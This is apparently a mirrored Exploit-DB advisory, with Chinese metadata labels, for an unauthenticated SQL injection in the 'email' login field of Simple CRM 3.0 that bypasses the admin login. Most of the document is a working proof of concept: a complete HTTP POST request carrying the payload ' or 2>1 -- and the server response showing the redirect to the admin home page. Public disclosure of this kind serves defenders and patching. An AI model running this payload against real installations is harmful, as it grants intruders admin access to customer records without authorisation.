Simple CRM 3.0 – ’email’ SQL injection (Authentication Bypass)

  • 作者: Rinku Kumar
    日期: 2021-06-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50055/
  • # Exploit Title: Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass) 
    # Date: 22/06/2021
    # Exploit Author: Rinku Kumar (rinku191)
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/small-crm-php/
    # Version: 3.0
    # Category: Webapps
    # Tested on: Apache2+MariaDB latest version
    # Description : Simple CRM suffers from SQL injection vulnerability, allowing an un-authenticated attackers to login into CRM admin panel.
    
    
    Vulnerable Page: /crm/admin/
    
    POC-Request
    -----------------------------------
    POST /scrm/crm/admin/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 35
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/scrm/crm/admin/
    Cookie: PHPSESSID=oj0mohnmrt809ndld8pg1p9f14
    Upgrade-Insecure-Requests: 1
    
    email='+or+2>1+--+&password=&login=
    
    ---------------------------------------
    POC-Response
    
    HTTP/1.1 200 OK
    Date: Tue, 22 Jun 2021 15:53:00 GMT
    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33
    X-Powered-By: PHP/7.2.33
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 48
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <script>window.location.href='https://www.exploit-db.com/exploits/50055/home.php'</script>